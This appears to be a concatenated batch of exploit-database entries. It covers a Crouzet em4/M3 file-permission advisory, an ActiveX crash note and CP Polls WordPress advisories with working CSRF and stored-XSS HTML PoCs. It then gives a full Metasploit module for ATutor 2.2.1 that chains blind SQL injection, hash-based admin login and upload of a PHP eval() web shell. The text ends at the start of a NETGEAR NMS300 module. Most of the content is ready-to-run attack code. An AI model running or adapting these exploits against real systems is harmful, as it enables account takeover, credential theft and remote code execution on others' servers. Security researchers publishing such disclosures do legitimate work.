                            @zeroscience


Advisory ID: ZSL-2016-5309
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php


25.01.2016

--


PoC: 

http://zeroscience.mk/codes/poc5309.pm4.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39509.zip
            

Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions


Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
                  M3 soft (3.1.2.0)

Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement, it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.

Desc: em4 soft and M3 soft suffer from an elevation-of-privilege vulnerability
caused by improper file-system permissions: the install directory and the
executables in it grant the 'Everyone' group the 'C' (Change) permission, so
any local, low-privileged user can replace 'em4 soft.exe', 'M3 soft.exe' or
the uninstaller with a binary of their choice. The planted binary then runs
with the privileges of whichever user next launches it (for example an
administrator running the application or the uninstaller).

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php


25.01.2016

--


C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
                                                   NT SERVICE\TrustedInstaller:(ID)F
                                                   NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                                   BUILTIN\Administrators:(ID)F
                                                   BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                                   BUILTIN\Users:(ID)R
                                                   BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                                 GENERIC_READ
                                                                                 GENERIC_EXECUTE

                                                   CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\Crouzet automation>cd "em4 soft"

C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
                                                                NT AUTHORITY\SYSTEM:(ID)F
                                                                BUILTIN\Administrators:(ID)F
                                                                BUILTIN\Users:(ID)R

C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
                                                                NT AUTHORITY\SYSTEM:(ID)F
                                                                BUILTIN\Administrators:(ID)F
                                                                BUILTIN\Users:(ID)R


C:\Program Files (x86)\Crouzet automation\em4 soft>


================================================================================================


C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
                                                        NT SERVICE\TrustedInstaller:(ID)F
                                                        NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                                        NT AUTHORITY\SYSTEM:(ID)F
                                                        NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                                        BUILTIN\Administrators:(ID)F
                                                        BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                                        BUILTIN\Users:(ID)R
                                                        BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                                      GENERIC_READ
                                                                                      GENERIC_EXECUTE

                                                        CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"

C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
                                                                    NT AUTHORITY\SYSTEM:(ID)F
                                                                    BUILTIN\Administrators:(ID)F
                                                                    BUILTIN\Users:(ID)R

C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
                                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                                     BUILTIN\Administrators:(ID)F
                                                                     BUILTIN\Users:(ID)R


C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>
            
# Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
# Date: 01-03-2016
# Exploit Author: Shantanu Khandelwal  Twitter: @shantanu561993 <shantanu561993@gmail.com>
# Vendor Homepage: http://www.viscomsoft.com/
# Software Link: http://www.viscomsoft.com/downloads/calendar.html
# Version: 2.0
# Tested on: Windows XP IE-8 , Windows 7 IE-8

Multiple access-violation crashes were found in the calender.ocx ActiveX control.
The PoCs below only demonstrate the crashes; exploitability beyond denial of service is not shown here.

POC: 

https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39512.zip
            
# Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

=============
 Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.

The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.

(copy of README.txt)


===================
 Technical details
===================

The CP Polls plugin for WordPress is vulnerable to persistent cross-site scripting: the option values
submitted on the poll settings page are not sanitised before being saved to the database. Because the
settings form has no CSRF protection, an attacker can exploit this by sending a crafted link to a
WordPress administrator; if the administrator opens it while logged in, the request is executed with
their privileges and the payload is stored.

=========================
 Proof of Concept (html)
=========================

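<html>
  <!-- CSRF PoC - Burp Suite i0 SecLab plugin -->
  <!-- We can find the Poll id in the source code of a post that embeds a CP poll by looking for 'CP_Polls_id'.
  We can find something like: <input type="hidden" name="CP_Polls_id" value="4" />
  4 is the Poll's id; with the id we can build the CSRF request below.
   -->
  <!-- Before use: replace "[ Poll id to update! ]" with that id and every "[PERSISTENT CODE INJECT HERE]"
  with the payload, URL-encoded (the body is application/x-www-form-urlencoded). The request is sent with
  the victim's cookies (withCredentials), so the administrator must be logged in to the WordPress site;
  browsers that default cookies to SameSite=Lax may not attach the session cookie to this cross-site POST,
  so the PoC may only work on older browsers or where the cookie is explicitly SameSite=None.
  Adjust the target host in xhr.open() as needed.
   -->
<body>
    <script>
      // Fires the forged poll-settings POST from the victim's browser.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:80/wordpress/wp-admin/options-general.php?page=CP_Polls&cal=1", true);
        // All three headers are CORS-safelisted, so no preflight is triggered.
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
        xhr.withCredentials = true;
        // The body must be ONE JavaScript string literal (the original listing split it across two lines,
        // which is a syntax error). Placeholders are marked with square brackets.
        var body = "CP_Polls_post_options=1&CP_Polls_id= [ Poll id to update! ]&poll_limit=2&poll_private_reports=false&poll_see_results=true&poll_text_seeres=  [PERSISTENT CODE INJECT HERE]  &poll_text_private=s&poll_text_votes=votes&fp_return_page=&form_structure=%5B%5B%7B%22form_identifier%22%3A%22%22%2C%22name%22%3A%22fieldname1%22%2C%22shortlabel%22%3A%22%22%2C%22index%22%3A0%2C%22ftype%22%3A%22fradio%22%2C%22userhelp%22%3A%22%22%2C%22userhelpTooltip%22%3Afalse%2C%22csslayout%22%3A%22%22%2C%22title%22%3A%22Select+a+Choice%22%2C%22layout%22%3A%22one_column%22%2C%22required%22%3Atrue%2C%22choiceSelected%22%3A%22%22%2C%22showDep%22%3Afalse%2C%22choices%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesVal%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesDep%22%3A%5B%5B%5D%2C%5B%5D%2C%5B%5D%5D%2C%22fBuild%22%3A%7B%7D%7D%5D%2C%5B%7B%22title%22%3A%22  [PERSISTENT CODE INJECT HERE]  %22%2C%22description%22%3A%22 [PERSISTENT CODE INJECT HERE]  %22%2C%22formlayout%22%3A%22top_aligned%22%2C%22formtemplate%22%3A%22%22%7D%5D%5D&vs_text_submitbtn=  [PERSISTENT CODE INJECT HERE]  &vs_text_previousbtn=Previous&vs_text_nextbtn=Next&vs_use_validation=true&vs_text_is_required=This+field+is+required.&cv_text_enter_valid_captcha=  [PERSISTENT CODE INJECT HERE]  .&vs_text_is_email=Please+enter+a+valid+email+address.&vs_text_datemmddyyyy=Please+enter+a+valid+date+with+this+format%28mm%2Fdd%2Fyyyy%29&vs_text_dateddmmyyyy=Please+enter+a+valid+date+with+this+format%28dd%2Fmm%2Fyyyy%29&vs_text_number=Please+enter+a+valid+number.&vs_text_digits=Please+enter+only+digits.&vs_text_max=Please+enter+a+value+less+than+or+equal+to+%7B0%7D.&vs_text_min=Please+enter+a+value+greater+than+or+equal+to+%7B0%7D.&fp_emailfrommethod=fixed&fp_from_email=admin%40localhost.com&fp_destination_emails=admin%40localhost.com&fp_subject=Contact+from+the+blog...&fp_inc_additional_info=true&fp_emailformat=text&fp_message=The+following+contact+message+has+been+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0A&cu_enable_copy_to_user=false&cu_subject=Confirmation%3A+Message+received...&cu_emailformat=text&cu_message=Thank+you+for+your+message.+We+will+reply+you+as+soon+as+possible.%0D%0A%0D%0AThis+is+a+copy+of+the+data+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0ABest+Regards.&cv_enable_captcha=false&cv_width=170&cv_height=60&cv_chars=5&cv_min_font_size=25&cv_max_font_size=35&cv_noise=200&cv_noise_length=4&cv_background=ffffff&cv_border=000000&cv_font=font-1.ttf&rep_enable=no&rep_days=1&rep_hour=0&rep_emails=&rep_subject=as&rep_emailformat=text&rep_message=Attached+you+will+find+the+data+from+the+form+submissions.&submit=Save+Changes";
        // Send the body as raw bytes so the browser does not re-encode it.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>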


################################################################################


# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU

===================
 Technical details
===================

The CP Polls plugin for WordPress is prone to a reflected file download issue. An attacker can target an
administrator by exploiting a CSRF weakness in the 'change cp poll name' action, turning the downloadable
report file (CSV) into a malicious .bat file. Because the poll name is not restricted, the CSRF exploit
can change it to ...

malicious.bat;

The semicolon (;) character must be rejected, because the 'Content-Disposition' header uses it as a
parameter delimiter. For example, when the poll name is changed to 'malicious.bat;' and an administrator
downloads the report (expecting a CSV file), the response header becomes:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
The trailing '.csv' is treated as a separate (empty) parameter and ignored, so the administrator is handed a .BAT file.


So, how can this be used to execute commands on the victim's machine?
If the poll is embedded in a post, anyone can vote on it, so the attacker can place the malicious payload
(the batch commands) into a vote, which then ends up in the exported report.

==============================
 Proof of Concept CSRF (html)
==============================

https://www.youtube.com/watch?v=uc6P59BPEkU

==========================

If the CSRF attack is successful, we only need to inject our commands through votes: the 'fieldnames'
POST parameter of the vote request is where the commands are placed.


################################################################################


# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

===================
 Technical details
===================

The CP Polls plugin for WordPress is prone to persistent XSS via a cross-site file upload.
When a poll is created through the UI its fields are sanitised correctly, but the CSV import path does not
apply the same sanitisation, so uploading a crafted CSV allows injection of arbitrary HTML/JavaScript.

There is no CSRF protection on the import action, so it can be exploited with a CSRF attack: send a
malicious link to a victim (an administrator) and wait for the request to be executed in their authenticated session.

=========================
 Proof of Concept (html)
=========================

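<html>
  <!-- CSRF PoC: forges the CP Polls CSV import request (admin.php?page=CP_Polls&cal=1&list=1&import=1).
  Replace <wp.host> with the target site. The CSV row below carries HTML/JavaScript in its columns; the
  import path does not sanitise it, so the payload is stored and later rendered to the administrator.
  The request is sent with the victim's cookies (withCredentials), so the administrator must be logged in;
  browsers that default cookies to SameSite=Lax may not attach the session cookie to this cross-site POST.
   -->
<body>
    <script>
      // Fires the forged multipart upload from the victim's browser.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
        // All three headers are CORS-safelisted, so no preflight is triggered.
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
        xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
        xhr.withCredentials = true;
        // Hand-built multipart body; the boundary must match the Content-Type header above.
        // The CSV row is ONE string literal (the original listing split it across two lines,
        // which is a syntax error).
        var body = "-----------------------------17460754011784\r\n" +
          "Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>, \"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
          "-----------------------------17460754011784\r\n" +
          "Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
          "\r\n" +
          "Import\r\n" +
          "-----------------------------17460754011784--\r\n";
        // Send the body as raw bytes so the browser does not re-encode it.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>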


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# ATutor 2.2.1 chain: (1) log in with a low-privileged student account,
# (2) use a blind boolean SQL injection in the social "search friends"
# feature to read the admin login and password hash from AT_admins,
# (3) log in as that admin using the hash itself (the login form only needs
# sha1(stored_hash + token), see get_hashed_password), and (4) install a
# "module" ZIP containing a PHP eval() stub, then trigger it with the payload.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata and options. USERNAME/PASSWORD are a *student* account;
  # the admin credentials are recovered through the injection at runtime.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
      'Description'    => %q{
         This module exploits a SQL Injection vulnerability and an authentication weakness
         vulnerability in ATutor. This essentially means an attacker can bypass authenication
         and reach the administrators interface where they can upload malcious code.

         You are required to login to the target to reach the SQL Injection, however this
         can be done as a student account and remote registration is enabled by default.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
        ],
      'References'     =>
        [
          [ 'CVE', '2016-2555'  ],
          [ 'URL', 'http://www.atutor.ca/' ] # Official Website
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Mar 1 2016',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ],self.class)
  end

  # The three print_* overrides only prefix every message with "host:port - ".
  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  # Active check: performs a real login with the supplied student credentials
  # and then fires two probe injections (1=1 / 1=2) against the search endpoint.
  # Returns Unknown when login itself fails (login aborts via fail_with, which
  # raises Msf::Exploit::Failed). Note this is not a passive version check.
  def check
    # the only way to test if the target is vuln
    begin
      test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    rescue Msf::Exploit::Failed => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    end

    if test_injection(test_cookie)
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds the malicious module archive: <3 random letters>/<4 random letters>.php
  # containing a PHP stub that eval()s the base64-decoded value of a custom
  # request header (PHP exposes it as $_SERVER['HTTP_<@header>']).
  # Side effects: sets @header, @payload_name and @plugin_name, which
  # upload_shell and exec_code rely on, and registers the dropped file for
  # cleanup so the backdoor does not outlive the session.
  def create_zip_file
    zip_file      = Rex::Zip::Archive.new
    @header       = Rex::Text.rand_text_alpha_upper(4)
    @payload_name = Rex::Text.rand_text_alpha_lower(4)
    @plugin_name  = Rex::Text.rand_text_alpha_lower(3)

    path = "#{@plugin_name}/#{@payload_name}.php"
    # Two cleanup paths: the bare file name and a path relative to where the
    # installer is presumed to copy the archive (content/module/) -- verify
    # on a live target that both resolve, otherwise the stub is left behind.
    register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")

    # NOTE(review): until cleanup runs this stub is an unauthenticated eval()
    # endpoint for anyone who knows the URL and the 4-letter header name.
    zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
    zip_file.pack
  end

  # Triggers the stub: GET /mods/<plugin>/<payload>.php carrying the
  # base64-encoded PHP payload in the random header chosen in create_zip_file.
  # The response is not inspected; success is observed via the payload handler.
  def exec_code
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
      'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    })
  end

  # Uploads the ZIP through the admin module installer and walks the two
  # redirect steps (install_modules.php -> module_install_step_1.php ->
  # module_install_step_2.php) needed to activate it.
  #
  # cookie - admin session cookie string returned by login(..., true)
  # Returns true on success; otherwise aborts with fail_with (Failure::Unknown).
  def upload_shell(cookie)
    post_data = Rex::MIME::Message.new
    post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
    data = post_data.to_s
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
      'method' => 'POST',
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => cookie,
      'agent' => 'Mozilla'
    })

    if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
         'cookie' => cookie,
         'agent'  => 'Mozilla',
       })
       if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
            'cookie' => cookie,
            'agent'  => 'Mozilla',
          })
       # NOTE(review): the step_2 response is never checked; true is returned
       # as soon as the two redirects matched, so a failed final step is
       # only noticed when exec_code yields no session.
       return true
       end
    end

    # auth failed if we land here, bail
    # (the message is about the upload, not authentication -- this branch is
    # reached for any unexpected response from the installer)
    fail_with(Failure::Unknown, "Unable to upload php code")
    return false
  end

  # Computes the value ATutor's login form expects in form_password_hidden.
  # Normal login:  sha1(sha1(plaintext) + token)  -- the client hashes the
  #                password first, then mixes in the per-page token.
  # bypass = true: sha1(stored_hash + token)      -- skips the inner sha1, so
  #                the sha1 hash recovered from AT_admins is enough to
  #                authenticate (this is the "authentication weakness").
  def get_hashed_password(token, password, bypass)
    if bypass
      return Rex::Text.sha1(password + token)
    else
      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
    end
  end

  # Logs in and returns a session cookie string of the form "ATutorID=...;".
  #
  # username - account name
  # password - plaintext (bypass = false) or stored sha1 hash (bypass = true)
  # bypass   - see get_hashed_password
  #
  # The token is scraped from login.php's inline JavaScript and the cookie is
  # re-captured after every redirect because the HttpClient keeps no state.
  # Aborts with fail_with (Failure::NoAccess) when the post-login redirect
  # does not match the expected flow.
  def login(username, password, bypass)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "login.php"),
      'agent' => 'Mozilla',
    })

    # NOTE(review): no nil check on res here -- an unreachable host raises
    # NoMethodError instead of a clean fail_with. If the regex does not match,
    # $1 keeps whatever an earlier match left in it.
    token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
    if bypass
      password = get_hashed_password(token, password, true)
    else
      password = get_hashed_password(token, password, false)
    end

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "login.php"),
      'vars_post' => {
        'form_password_hidden' => password,
        'form_login' => username,
        'submit' => 'Login'
      },
      'cookie' => cookie,
      'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/

    # this is what happens when no state is maintained by the http client
    if res && res.code == 302
       # Student flow: bounce.php?course=0 -> users/index.php
       if res.redirection.to_s.include?('bounce.php?course=0')
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalize_uri(target_uri.path, res.redirection),
          'cookie' => cookie,
          'agent' => 'Mozilla'
        })
        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
           res = send_request_cgi({
             'method'   => 'GET',
             'uri'      => normalize_uri(target_uri.path, res.redirection),
             'cookie' => cookie,
             'agent' => 'Mozilla'
           })
           cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
           return cookie
          end
       # NOTE(review): this is a plain `else` followed by an expression whose
       # result is discarded, not an `elsif` -- ANY 302 that is not
       # bounce.php?course=0 is treated as a successful admin login.
       else res.redirection.to_s.include?('admin/index.php')
          # if we made it here, we are admin
          return cookie
       end
    end

    # auth failed if we land here, bail
    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
  end

  # Sends one injected search to mods/_standard/social/connections.php and
  # returns the raw response body.
  #
  # sqli   - a boolean SQL expression; it is spliced into
  #          "<3 random chars>' or <sqli> or 1='" so that the surrounding
  #          quotes in the original query stay balanced.
  # cookie - an authenticated (student) session cookie
  #
  # NOTE(review): res is not nil-checked before res.body.
  def perform_request(sqli, cookie)
    # the search requires a minimum of 3 chars
    sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
    rand_key = Rex::Text.rand_text_alpha(1)
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
      'vars_post' => {
        "search_friends_#{rand_key}" => sqli,
        'rand_key' => rand_key,
        'search' => 'Search People'
      },
      'cookie' => cookie,
      'agent' => 'Mozilla'
    })
    return res.body
  end

   # Extracts "login:password" of the first row of AT_admins one character at
   # a time (length first, then a binary search per character) and returns
   # [login, hash] via String#split(":").
   #
   # NOTE(review): the `do_true=false, do_test=false, sql=sqli` in the first
   # call are local-variable assignments, not keyword arguments -- Ruby passes
   # them positionally, which happens to line up with the method signature.
   # NOTE(review): get_ascii_value can return nil (see there); `nil >= 0`
   # would raise NoMethodError in the loop below.
   def dump_the_hash(cookie)
    extracted_hash = ""
    sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
    login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
    for i in 1..login_and_hash_length
       sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
       asciival = generate_sql_and_test(false, false, sqli, cookie)
       if asciival >= 0
          extracted_hash << asciival.chr
       end
    end
    return extracted_hash.split(":")
  end

  # Binary-searches the integer value of `sql` in the range 0..126 using the
  # "There are N entries." line as a boolean oracle: a true condition makes
  # the injected OR match every user, a false one matches nothing.
  #
  # NOTE(review): the oracle regex uses a single `\d`, so a result count of
  # 10 or more never matches and every probe reads as false -- confirm the
  # exact wording on a target with many users.
  # NOTE(review): when the search ends at 0 or 126 and the final equality
  # probe does not match, `value` is never assigned and nil is returned.
  def get_ascii_value(sql, cookie)
    lower = 0
    upper = 126
    while lower < upper
       mid = (lower + upper) / 2
       sqli = "#{sql}>#{mid}"
       result = perform_request(sqli, cookie)
       if result =~ /There are \d entries./
        lower = mid + 1
       else
        upper = mid
       end
    end
    if lower > 0 and lower < 126
       value = lower
    else
       sqli = "#{sql}=#{lower}"
       result = perform_request(sqli, cookie)
       if result =~ /There are \d entries./
          value = lower
       end
    end
    return value
  end

  # Dispatcher used by check/test_injection and dump_the_hash:
  #   do_test = true,  do_true = true  -> true if "1=1" yields entries
  #   do_test = true,  do_true = false -> true if "1=2" yields no entries
  #   do_test = false, sql given       -> get_ascii_value(sql, cookie)
  # Returns nil in every other combination.
  #
  # NOTE(review): `else not do_true` is an `else` with a discarded
  # expression; it behaves as a plain else, so the comment-like intent is
  # only cosmetic.
  def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
    if do_test
      if do_true
        result = perform_request("1=1", cookie)
        if result =~ /There are \d entries./
          return true
        end
      else not do_true
        result = perform_request("1=2", cookie)
        if not result =~ /There are \d entries./
          return true
        end
      end
    elsif not do_test and sql
      return get_ascii_value(sql, cookie)
    end
  end

  # The injection point is considered present when a true condition (1=1)
  # returns entries AND a false one (1=2) does not.
  def test_injection(cookie)
    if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
       if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
        return true
       end
    end
    return false
  end

  # Records the working student credentials in the Metasploit database.
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      post_reference_name: self.refname,
      private_data: opts[:password],
      origin_type: :service,
      private_type: :password,
      username: opts[:user]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: Time.now
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Full chain: student login -> dump admin login:hash -> admin login with the
  # hash -> module upload -> trigger.
  def exploit
    student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
    report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])

    print_status("Dumping username and password hash...")
    # we got admin hash now
    credz = dump_the_hash(student_cookie)
    # NOTE(review): credz is always an Array (String#split), so `if credz`
    # below can never be false; if extraction yielded an empty string,
    # credz[0]/credz[1] are nil and this line prints "Got the  hash:  !".
    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
    if credz
      # bypass = true: authenticate with the recovered hash directly
      admin_cookie = login(credz[0], credz[1], true)
      print_status("Logged in as #{credz[0]}, uploading shell...")
      # install a plugin
      if upload_shell(admin_cookie)
        print_good("Shell upload successful!")
        # boom
        exec_code
      end
    end
  end
end
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# NETGEAR ProSafe NMS300: unauthenticated multipart upload to /fileUpload.do
# drops a JSP into the web root; the JSP writes the embedded EXE payload to a
# temp file and executes it. The web server runs as SYSTEM on Windows, hence
# 'Privileged' => true.
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

